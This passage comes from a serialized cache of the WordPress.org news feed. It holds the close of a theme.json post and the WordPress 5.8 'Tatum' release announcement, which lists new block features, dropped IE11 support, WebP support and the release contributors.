src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?resize=632%2C444&#038;ssl=1\" alt=\"\" data-id=\"11072\" data-full-url=\"https://wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png\" data-link=\"https://wordpress.org/news/?attachment_id=11072\" class=\"wp-image-11072\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?resize=1024%2C719&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?resize=300%2C211&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?resize=768%2C539&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?resize=1536%2C1079&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?resize=2048%2C1438&amp;ssl=1 2048w, https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?w=1264&amp;ssl=1 1264w, https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li></ul></figure>\n\n\n\n<h2>What&#8217;s Next?</h2>\n\n\n\n<p>I hope this gives you a sense of what&#8217;s possible and where themes are going. The above examples just scratch the surface of what kinds of theme design configurations are possible, and I’m very excited to see what theme authors create.</p>\n\n\n\n<p>If you&#8217;re interested in learning more, <a href=\"https://make.wordpress.org/core/2021/06/25/introducing-theme-json-in-wordpress-5-8/\">here&#8217;s the developer note on theme.json</a>, and <a href=\"https://developer.wordpress.org/block-editor/how-to-guides/themes/theme-json/\">here&#8217;s the documentation for theme.json</a> in the handbook.</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><em><strong>Thanks to <a href=\"https://profiles.wordpress.org/kjellr/\">@kjellr</a>, <a href=\"https://profiles.wordpress.org/chanthaboune/\">@</a></strong></em><strong><em><a href=\"https://profiles.wordpress.org/chanthaboune/\">chanthaboune</a>, <a href=\"https://profiles.wordpress.org/priethor/\">@priethor</a>, <a href=\"https://profiles.wordpress.org/annezazu/\">@annezazu</a> for helping with and peer-reviewing this post.</em></strong></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11060\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"WordPress 5.8 Tatum\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2021/07/tatum/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 20 Jul 2021 17:43:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"5.8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10976\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:277:\"Introducing 5.8 “Tatum”, our latest and greatest release, named in honor of the legendary jazz pianist Art Tatum. This release includes an all new widget editor powered by blocks, major technical tools for building block themes, as well as newly streamlined workflow tools.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:55719:\"\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"632\" height=\"422\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/07/5x8-Album-1.jpg?resize=632%2C422&#038;ssl=1\" alt=\"\" class=\"wp-image-11042\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Introducing 5.8 “Tatum”, our latest and greatest release now available for&nbsp;<a href=\"https://wordpress.org/download/\">download</a>&nbsp;or update in your dashboard. Named in honor of Art Tatum, the legendary Jazz pianist. His formidable technique and willingness to push boundaries inspired musicians and changed what people thought could be done.&nbsp;</p>\n\n\n\n<p>So fire up your music service of choice and enjoy Tatum’s famous recordings of ‘Tea for Two’, ‘Tiger Rag’, ‘Begin the Beguine’, and ‘Night and Day’ as you read about what the latest WordPress version brings to you.</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<h2 class=\"has-text-align-center\">Three Essential Powerhouses</h2>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"632\" height=\"474\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/about-widgets-blocks.png?resize=632%2C474&#038;ssl=1\" alt=\"\" data-id=\"10985\" data-full-url=\"https://wordpress.org/news/files/2021/07/about-widgets-blocks.png\" data-link=\"https://wordpress.org/news/?attachment_id=10985\" class=\"wp-image-10985\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/about-widgets-blocks.png?resize=1024%2C768&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-widgets-blocks.png?resize=300%2C225&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-widgets-blocks.png?resize=768%2C576&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-widgets-blocks.png?w=1280&amp;ssl=1 1280w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure></li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"632\" height=\"501\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/about-query-loop.png?resize=632%2C501&#038;ssl=1\" alt=\"\" data-id=\"10986\" data-full-url=\"https://wordpress.org/news/files/2021/07/about-query-loop.png\" data-link=\"https://wordpress.org/news/?attachment_id=10986\" class=\"wp-image-10986\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/about-query-loop.png?resize=1024%2C811&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-query-loop.png?resize=300%2C238&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-query-loop.png?resize=768%2C608&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-query-loop.png?w=1280&amp;ssl=1 1280w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure></li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"632\" height=\"411\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/about-template.png?resize=632%2C411&#038;ssl=1\" alt=\"\" data-id=\"10987\" data-full-url=\"https://wordpress.org/news/files/2021/07/about-template.png\" data-link=\"https://wordpress.org/news/?attachment_id=10987\" class=\"wp-image-10987\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/about-template.png?resize=1024%2C666&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-template.png?resize=300%2C195&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-template.png?resize=768%2C499&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-template.png?w=1280&amp;ssl=1 1280w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure></li></ul></figure>\n\n\n\n<h3>Manage Widgets with Blocks</h3>\n\n\n\n<p>After months of hard work, the power of blocks has come to both the Block Widgets Editor and the Customizer. Now you can add blocks both in widget areas across your site and with live preview through the Customizer. This opens up new possibilities to create content: from no-code mini layouts to the vast library of core and third-party blocks. For our developers, you can find more details in the&nbsp;<a href=\"https://make.wordpress.org/core/2021/06/29/block-based-widgets-editor-in-wordpress-5-8/\">Widgets dev note</a>.</p>\n\n\n\n<h3>Display Posts with New Blocks and Patterns</h3>\n\n\n\n<p>The Query Loop Block makes it possible to display posts based on specified parameters; like a PHP loop without the code. Easily display posts from a specific category, to do things like create a portfolio or a page full of your favorite recipes. Think of it as a more complex and powerful Latest Posts Block! Plus, pattern suggestions make it easier than ever to create a list of posts with the design you want.</p>\n\n\n\n<h3>Edit the Templates Around Posts</h3>\n\n\n\n<p>You can use the familiar block editor to edit templates that hold your content—simply activate a block theme or a theme that has opted in for this feature. Switch from editing your posts to editing your pages and back again, all while using a familiar block editor. There are more than 20 new blocks available within compatible themes. Read more about this feature and how to experiment with it in the release notes.</p>\n\n\n\n<div style=\"height:32px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"has-text-align-center\">Three Workflow Helpers</h2>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"632\" height=\"496\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/about-list-view.png?resize=632%2C496&#038;ssl=1\" alt=\"\" data-id=\"10988\" data-full-url=\"https://wordpress.org/news/files/2021/07/about-list-view.png\" data-link=\"https://wordpress.org/news/?attachment_id=10988\" class=\"wp-image-10988\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/about-list-view.png?resize=1024%2C803&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-list-view.png?resize=300%2C235&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-list-view.png?resize=768%2C602&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-list-view.png?w=1280&amp;ssl=1 1280w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure></li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"632\" height=\"343\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/about-pattern-suggestions.png?resize=632%2C343&#038;ssl=1\" alt=\"\" data-id=\"10989\" data-full-url=\"https://wordpress.org/news/files/2021/07/about-pattern-suggestions.png\" data-link=\"https://wordpress.org/news/?attachment_id=10989\" class=\"wp-image-10989\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/about-pattern-suggestions.png?resize=1024%2C555&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-pattern-suggestions.png?resize=300%2C163&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-pattern-suggestions.png?resize=768%2C416&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/about-pattern-suggestions.png?w=1280&amp;ssl=1 1280w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure></li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"632\" height=\"517\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/07/about-duotone.png?resize=632%2C517&#038;ssl=1\" alt=\"\" data-id=\"10990\" data-full-url=\"https://wordpress.org/news/files/2021/07/about-duotone.png\" data-link=\"https://wordpress.org/news/?attachment_id=10990\" class=\"wp-image-10990\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2021/07/about-duotone.png?resize=1024%2C837&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2021/07/about-duotone.png?resize=300%2C245&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2021/07/about-duotone.png?resize=768%2C628&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2021/07/about-duotone.png?w=1280&amp;ssl=1 1280w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure></li></ul></figure>\n\n\n\n<h3>Overview of the Page Structure</h3>\n\n\n\n<p>Sometimes you need a simple landing page, but sometimes you need something a little more robust. As blocks increase, patterns emerge, and content creation gets easier, new solutions are needed to make complex content easy to navigate. List View is the best way to jump between layers of content and nested blocks. Since the List View gives you an overview of all the blocks in your content, you can now navigate quickly to the precise block you need. Ready to focus completely on your content? Toggle it on or off to suit your workflow.</p>\n\n\n\n<h3>Suggested Patterns for Blocks</h3>\n\n\n\n<p>Starting in this release the Pattern Transformations tool will suggest block patterns based on the block you are using. Right now, you can give it a try in the Query Block and Social Icon Block. As more patterns are added, you will be able to get inspiration for how to style your site without ever leaving the editor!</p>\n\n\n\n<h3>Style and Colorize Images</h3>\n\n\n\n<p>Colorize your image and cover blocks with duotone filters! Duotone can add a pop of color to your designs and style your images (or videos in the cover block) to integrate well with your themes. You can think of the duotone effect as a black and white filter, but instead of the shadows being black and the highlights being white, you pick your own colors for the shadows and highlights. There’s more to learn about how it works in the documentation.</p>\n\n\n\n<div style=\"height:32px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"has-text-align-center\">For Developers to Explore</h2>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"632\" height=\"378\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?resize=632%2C378&#038;ssl=1\" alt=\"\" class=\"wp-image-10992\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?resize=1024%2C613&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?resize=300%2C179&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?resize=768%2C459&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?resize=1536%2C919&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?resize=2048%2C1225&amp;ssl=1 2048w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?w=1264&amp;ssl=1 1264w, https://i1.wp.com/wordpress.org/news/files/2021/07/about-theme-json-2x.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h3>Theme.json</h3>\n\n\n\n<p>Introducing the Global Styles and Global Settings APIs: control the editor settings, available customization tools, and style blocks using a theme.json file in the active theme. This configuration file enables or disables features and sets default styles for both a website and blocks. If you build themes, you can experiment with this early iteration of a useful new feature. For more about what is currently available and how it works,&nbsp;<a href=\"https://make.wordpress.org/core/2021/06/25/introducing-theme-json-in-wordpress-5-8/\">check out this dev note</a>.</p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-columns\">\n<div class=\"wp-block-column\">\n<h3>Dropping support for IE11</h3>\n\n\n\n<p>Support for Internet Explorer 11 has been dropped as of this release. This means you may have issues managing your site that will not be fixed in the future. If you are currently using IE11, it is strongly recommended that you&nbsp;<a href=\"https://browsehappy.com/\">switch to a more modern browser</a>.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\">\n<h3>Adding support for WebP</h3>\n\n\n\n<p>WebP is a modern image format that provides improved lossless and lossy compression for images on the web. WebP images are around 30% smaller on average than their JPEG or PNG equivalents, resulting in sites that are faster and use less bandwidth.</p>\n</div>\n</div>\n\n\n\n<h3>Adding Additional Block Supports</h3>\n\n\n\n<p>Expanding on previously implemented block supports in WordPress&nbsp;<a href=\"https://make.wordpress.org/core/2020/11/18/block-supports-in-wordpress-5-6/\">5.6</a>&nbsp;and&nbsp;<a href=\"https://make.wordpress.org/core/2021/02/24/changes-to-block-editor-components-and-blocks/\">5.7</a>, WordPress 5.8 introduces several new block support flags and new options to customize your registered blocks. More information is available in the&nbsp;<a href=\"https://make.wordpress.org/core/2021/06/25/block-supports-api-updates-for-wordpress-5-8/\">block supports dev note</a>.</p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h3>Check the Field Guide for more!</h3>\n\n\n\n<p>Check out the latest version of the WordPress Field Guide. It highlights developer notes for each change you may want to be aware of:&nbsp;<a href=\"https://make.wordpress.org/core/2021/07/03/wordpress-5-8-field-guide/\">WordPress 5.8 Field Guide.</a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<h2>The Squad</h2>\n\n\n\n<p>The WordPress 5.8 release was led by <a href=\"https://profiles.wordpress.org/matt/\">Matt Mullenweg</a>, and supported by this highly enthusiastic release squad:</p>\n\n\n\n<ul><li><strong>Release Co-Coordinator:</strong>&nbsp;Jeffrey Paul (<a href=\'https://profiles.wordpress.org/jeffpaul/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jeffpaul</a>)</li><li><strong>Release Co-Coordinator:</strong>&nbsp;Jonathan Desrosiers (<a href=\'https://profiles.wordpress.org/desrosj/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>desrosj</a>)</li><li><strong>Editor Tech Lead:</strong>&nbsp;Riad Benguella (<a href=\'https://profiles.wordpress.org/youknowriad/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>youknowriad</a>)</li><li><strong>Marketing and Communications Lead:</strong> Josepha Haden Chomphosy (<a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a>)</li><li><strong>Documentation Lead:</strong> Milana Cap (<a href=\'https://profiles.wordpress.org/milana_cap/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>milana_cap</a>)</li><li><strong>Test Lead:</strong>&nbsp;Piotrek Boniu (<a href=\'https://profiles.wordpress.org/boniu91/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>boniu91</a>)</li><li><strong>Support Lead:&nbsp;</strong>Mary Job (<a href=\'https://profiles.wordpress.org/mariaojob/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mariaojob</a>)</li></ul>\n\n\n\n<p>This release is the reflection of the hard work of 530 generous volunteer contributors. Collaboration occurred on over <a href=\"https://core.trac.wordpress.org/query?milestone=5.8&amp;group=component&amp;col=id&amp;col=summary&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=status&amp;col=priority&amp;order=priority\">320 tickets on Trac</a> and over <a href=\"https://github.com/wordpress/gutenberg/compare/v10.0.0...v10.7.0\">1,500 pull requests on GitHub</a>.</p>\n\n\n\n<a href=\"https://profiles.wordpress.org/2linctools/\">2linctools</a>, <a href=\"https://profiles.wordpress.org/5ubliminal/\">5ubliminal</a>, <a href=\"https://profiles.wordpress.org/ninetyninew/\">99w</a>, <a href=\"https://profiles.wordpress.org/9primus/\">9primus</a>, <a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/aaronrobertshaw/\">Aaron Robertshaw</a>, <a href=\"https://profiles.wordpress.org/abderrahman/\">abderrahman</a>, <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a>, <a href=\"https://profiles.wordpress.org/abhijitrakas/\">Abhijit Rakas</a>, <a href=\"https://profiles.wordpress.org/achbed/\">achbed</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/zieladam/\">Adam Zielinski</a>, <a href=\"https://profiles.wordpress.org/addiestavlo/\">Addie</a>, <a href=\"https://profiles.wordpress.org/aduth/\">aduth</a>, <a href=\"https://profiles.wordpress.org/chaion07/\">Ahmed Chaion</a>, <a href=\"https://profiles.wordpress.org/engahmeds3ed/\">Ahmed Saeed</a>, <a href=\"https://profiles.wordpress.org/ajitbohra/\">Ajit Bohra</a>, <a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/alanjacobmathew/\">Alan Jacob Mathew</a>, <a href=\"https://profiles.wordpress.org/aljullu/\">Albert Juh&#233; Lluveras</a>, <a href=\"https://profiles.wordpress.org/aleperez92/\">Alejandro Perez</a>, <a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/akirk/\">Alex Kirk</a>, <a href=\"https://profiles.wordpress.org/ajlende/\">Alex Lende</a>, <a href=\"https://profiles.wordpress.org/alexstine/\">alexstine</a>, <a href=\"https://profiles.wordpress.org/algala/\">AlGala</a>, <a href=\"https://profiles.wordpress.org/firewatch/\">allilevine</a>, <a href=\"https://profiles.wordpress.org/amandariu/\">Amanda Riu</a>, <a href=\"https://profiles.wordpress.org/amarinediary/\">amarinediary</a>, <a href=\"https://profiles.wordpress.org/gadgetroid/\">Amogh Harish</a>, <a href=\"https://profiles.wordpress.org/oandregal/\">Andr&#233;</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andrewserong/\">Andrew Serong</a>, <a href=\"https://profiles.wordpress.org/rarst/\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/nosolosw/\">André Maneiro</a>, <a href=\"https://profiles.wordpress.org/afragen/\">Andy Fragen</a>, <a href=\"https://profiles.wordpress.org/apeatling/\">Andy Peatling</a>, <a href=\"https://profiles.wordpress.org/andy/\">Andy Skelton</a>, <a href=\"https://profiles.wordpress.org/wpgurudev/\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankitmaru/\">Ankit Panchal</a>, <a href=\"https://profiles.wordpress.org/annalamprou/\">annalamprou</a>, <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a>, <a href=\"https://profiles.wordpress.org/anotherdave/\">anotherdave</a>, <a href=\"https://profiles.wordpress.org/anotia/\">anotia</a>, <a href=\"https://profiles.wordpress.org/antpb/\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/antonlukin/\">Anton Lukin</a>, <a href=\"https://profiles.wordpress.org/vanyukov/\">Anton Vanyukov</a>, <a href=\"https://profiles.wordpress.org/antonvlasenko/\">Anton Vlasenko</a>, <a href=\"https://profiles.wordpress.org/antonisme/\">Antonis Lilis</a>, <a href=\"https://profiles.wordpress.org/apedog/\">apedog</a>, <a href=\"https://profiles.wordpress.org/apokalyptik/\">apokalyptik</a>, <a href=\"https://profiles.wordpress.org/arena/\">arena</a>, <a href=\"https://profiles.wordpress.org/lephleg/\">Argyris Margaritis</a>, <a href=\"https://profiles.wordpress.org/aristath/\">Ari Stathopoulos</a>, <a href=\"https://profiles.wordpress.org/ariskataoka/\">ariskataoka</a>, <a href=\"https://profiles.wordpress.org/arkrs/\">arkrs</a>, <a href=\"https://profiles.wordpress.org/aruphi/\">Armand</a>, <a href=\"https://profiles.wordpress.org/arnaudban/\">ArnaudBan</a>, <a href=\"https://profiles.wordpress.org/arthur791004/\">Arthur Chu</a>, <a href=\"https://profiles.wordpress.org/arunsathiya/\">Arun</a>, <a href=\"https://profiles.wordpress.org/aspexi/\">Aspexi</a>, <a href=\"https://profiles.wordpress.org/atjn/\">atjn</a>, <a href=\"https://profiles.wordpress.org/aurooba/\">Aurooba Ahmed</a>, <a href=\"https://profiles.wordpress.org/filosofo/\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/ayeshrajans/\">Ayesh Karunaratne</a>, <a href=\"https://profiles.wordpress.org/barry/\">Barry</a>, <a href=\"https://profiles.wordpress.org/bartkalisz/\">bartkalisz</a>, <a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a>, <a href=\"https://profiles.wordpress.org/pixolin/\">Bego Mario Garde</a>, <a href=\"https://profiles.wordpress.org/utz119/\">Benachi</a>, <a href=\"https://profiles.wordpress.org/benoitchantre/\">Benoit Chantre</a>, <a href=\"https://profiles.wordpress.org/bernhard-reiter/\">Bernhard Reiter</a>, <a href=\"https://profiles.wordpress.org/bernhard reiter/\">Bernhard Reiter</a>, <a href=\"https://profiles.wordpress.org/birgire/\">Birgir Erlendsson (birgire)</a>, <a href=\"https://profiles.wordpress.org/bph/\">Birgit Pauli-Haack</a>, <a href=\"https://profiles.wordpress.org/blobfolio/\">Blobfolio</a>, <a href=\"https://profiles.wordpress.org/bmcculley/\">bmcculley</a>, <a href=\"https://profiles.wordpress.org/boblinthorst/\">Bob Linthorst</a>, <a href=\"https://profiles.wordpress.org/bobbingwide/\">bobbingwide</a>, <a href=\"https://profiles.wordpress.org/bogdanpreda/\">Bogdan Preda</a>, <a href=\"https://profiles.wordpress.org/gitlost/\">bonger</a>, <a href=\"https://profiles.wordpress.org/boonebgorges/\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/bradt/\">Brad Touesnard</a>, <a href=\"https://profiles.wordpress.org/kraftbj/\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/brechtvds/\">Brecht</a>, <a href=\"https://profiles.wordpress.org/brentswisher/\">Brent Swisher</a>, <a href=\"https://profiles.wordpress.org/brettshumaker/\">Brett Shumaker</a>, <a href=\"https://profiles.wordpress.org/ribaricplusplus/\">Bruno Ribaric</a>, <a href=\"https://profiles.wordpress.org/burhandodhy/\">Burhan Nasir</a>, <a href=\"https://profiles.wordpress.org/cameronjonesweb/\">Cameron Jones</a>, <a href=\"https://profiles.wordpress.org/cvoell/\">Cameron Voell</a>, <a href=\"https://profiles.wordpress.org/carike/\">Carike</a>, <a href=\"https://profiles.wordpress.org/carlalexander/\">Carl Alexander</a>, <a href=\"https://profiles.wordpress.org/carlomanf/\">carlomanf</a>, <a href=\"https://profiles.wordpress.org/carlosgprim/\">Carlos Garcia Prim</a>, <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/caseymilne/\">Casey Milne</a>, <a href=\"https://profiles.wordpress.org/cenay/\">Cenay Nailor</a>, <a href=\"https://profiles.wordpress.org/ceyhun0/\">Ceyhun Ozugur</a>, <a href=\"https://profiles.wordpress.org/nhuja/\">Chandra M</a>, <a href=\"https://profiles.wordpress.org/chetan200891/\">Chetan Prajapati</a>, <a href=\"https://profiles.wordpress.org/chintan1896/\">Chintan hingrajiya</a>, <a href=\"https://profiles.wordpress.org/chipsnyder/\">Chip Snyder</a>, <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a>, <a href=\"https://profiles.wordpress.org/chouby/\">Chouby</a>, <a href=\"https://profiles.wordpress.org/chrisvanpatten/\">Chris Van Patten</a>, <a href=\"https://profiles.wordpress.org/chriscct7/\">chriscct7</a>, <a href=\"https://profiles.wordpress.org/vimes1984/\">Christopher Churchill</a>, <a href=\"https://profiles.wordpress.org/ryno267/\">Chuck Reynolds</a>, <a href=\"https://profiles.wordpress.org/claytoncollie/\">Clayton Collie</a>, <a href=\"https://profiles.wordpress.org/codeamp/\">Code Amp</a>, <a href=\"https://profiles.wordpress.org/design_dolphin/\">CodePoet</a>, <a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a>, <a href=\"https://profiles.wordpress.org/collizo4sky/\">Collins Agbonghama</a>, <a href=\"https://profiles.wordpress.org/copons/\">Copons</a>, <a href=\"https://profiles.wordpress.org/coreymckrill/\">Corey McKrill</a>, <a 